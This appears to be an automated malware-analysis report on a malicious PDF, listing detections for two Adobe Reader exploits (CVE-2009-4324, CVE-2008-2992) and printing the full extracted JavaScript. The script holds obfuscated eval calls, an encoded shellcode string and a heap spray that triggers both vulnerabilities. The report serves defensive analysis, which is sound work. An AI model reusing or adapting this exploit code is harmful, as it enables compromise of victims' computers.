MALICIOUS
168
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 JavaScript/JScript
The PDF contains embedded JavaScript, indicated by multiple heuristic firings and the presence of a javascript_obj0016_000.js artifact. The ML classifier strongly suggests malicious intent. The embedded JavaScript is likely designed to perform malicious actions, such as downloading a second-stage payload or exploiting vulnerabilities, although the exact functionality cannot be determined without deobfuscation. The benign URLs found are standard PDF namespaces and do not indicate malicious activity.
Machine Learning
- Nyx PDF Classifier malicious score 0.9957
Heuristics 5
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0016_000.js |
pdf-javascript-stream | PDF /JS object 16 at offset 0x2FE | 4333 bytes |
SHA-256: 3955fe30e7b673d35cbc14d8419c334803ff259dacc720f3dc2d5fa0b6513098 |
|||
Preview scriptFirst 1,000 lines of the extracted script
xxxxx='ev';yyyyy='al';zzzzz=xxxxx+yyyyy;aaaaa=app;try {} catch(e)
{zzzzz=1;aaaaa=1;}try {d=nothis_nothis;zzzzz=1;aaaaa=1;} catch(e) {}aaaaa[zzzzz]('ddddd'+'dd=une'+'sca'/**/+/**/'pe;');try {adsfadsf=e2e2;ddddddd=1;} catch(e) {}dxdxdx=aaaaa[zzzzz];this.zoom = this.zoom*1;var XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL = ddddddd(ddddddd("%25u4141%25u4141%25u4141%25u01e8%25u0000%25u0000%25u0c8b%25u8324%25u04c4%25u498d%25u4112%25u3180%25u8089%25u9039%25uf775%25udb62%25u02bf%25ub5fc%25u02bf%25ubcfd%25u8af1%25udf7c%25u02b7%25ua9ff%25u7c8a%25u40ba%25uc8c0%25uba24%25ubf52%25u3786%25ua19d%25u5fb3%25u81fd%25u4248%25u8a84%25uc953%25u6662%25u56b2%25u6efc%25ub7d7%25ud702%25u8aad%25uef54%25u02b7%25uc285%25u02b7%25u95d7%25u548a%25u02b7%25u028d%25u4c8a%25ufc4a%25ue5fb%25ue6e4%25ua7e7%25ue5ed%25u89e5%25u49ba%25u8aed%25ub9c9%25u86f1%25u02b7%25u85c9%25u02b7%25u95f9%25ub724%25uc902%25u6281%25ub785%25uc902%25ub7bd%25uc904%25ub7f5%25uc902%25u1cb5%25uba36%25u0343%25u61d2%25u7609%25u7676%25u6508%25u8889%25u8989%25ue1dd%25u8889%25u8989%25u5976%25ub136%25u25ab%25u616e%25u76e1%25u7676%25u52ba%25u7d02%25udadd%25udfda%25u5976%25u0736%25u87c7%25u6165%25u76dd%25u7676%25u650a%25ubf8d%25ua50a%25uecad%25u5976%25ud91c%25ubf36%25ua693%25u61f9%25u76b7%25u7676%25u02d4%25uba7d%25uda52%25udfda%25u8961%25u8989%25ud689%25u4e0a%25udec3%25u61da%25u8989%25u8989%25u0ad6%25u864e%25udcde%25u6502%25uc9c9%25uc9c9%25u76c9%25u3669%25u7711%25u8703%25u8461%25u7676%25u0276%25ue37d%25udf89%25u8961%25u8989%25ud689%25u4e0a%25ude86%25u02dc%25uc965%25uc9c9%25uc9c9%25u6976%25u6636%25u6947%25u61e9%25u7763%25u7676%25u76da%25uE159%25uFDFD%25uB3F9%25uA6A6%25uE5EA%25uFFE8%25uA7EC%25uECEB%25uEAA6%25uFAFA%25uEAA6%25uE5E8%25uA7EA%25uF1EC%25u89EC%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989%25u8989"));
var IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp = ddddddd("%"+/**/"u0"+/**/"a0a"+/**/"%"+/**/"u"+/**/"0a"+/**/"0a");
var wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn = ddddddd(ddddddd("%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%"+/**/"25u0"+/**/"a0a"+/**/"%"+/**/"25u"+/**/"0a"+/**/"0a"+"%25u4478%25u4a75%25u6457%25u6865%25u5846%25u496b%25u4d6b%25u4373%25u6756%25u5a58%25u575a%25u7856%25u4b54%25u5858%25u6543%25u7474%25u7273%25u4153%25u4b4e%25u6e70%25u516f%25u4345%25u7870%25u624c%25u7456%25u6e72%25u4743%25u4b4d"));
this.zoom = this.zoom*1;
var version = app.viewerVersion.toString();
try{mmm=do_not_do_this;} catch(e){lenlen = (0x150000/2);pppppp = 0x100000/2-0x200;lenlenlen = 700;}
if(version>=8.0)
{
lenlen = (0x10000/2);
pppppp = 32768-0x200;
lenlenlen = 0x1000;
}
while(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.length <= lenlen) IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp+=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp;
dxdxdx("IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.subst"+/********************/"ring(0,pppppp);");muuuuu=new Array();this.zoom = this.zoom*1;
for(i=0;i<lenlenlen;i++) {muuuuu[i]= IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp + XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL;}util.printd("zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw", new Date());
if(version>=8.0)
{
util.printd("UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt", new Date());
var xxx=ddddddd("this.%20%20%20me"+/**/"dia.%20%20%20new"+/**/"Play"+/**/"er%28nu"+/**/"ll%29%3B");
try {dxdxdx(xxx);} catch(e) {}
util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn, new Date());
}
if(version>=7.0 && version<8)
{
var la = '12999999999999999999';
for(ii=0;ii<276;ii++)
la += '8';
var yyy=ddddddd("util.%20%20%20pr"+/**/"%69%6etf"+/**/"%28%22%25"+/**/"%34%35%30%30%30%66"+/**/"%22%2C%6c%61%29%3B");
try{nnn=do_not_do_this;} catch(e){dxdxdx(yyy)}
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.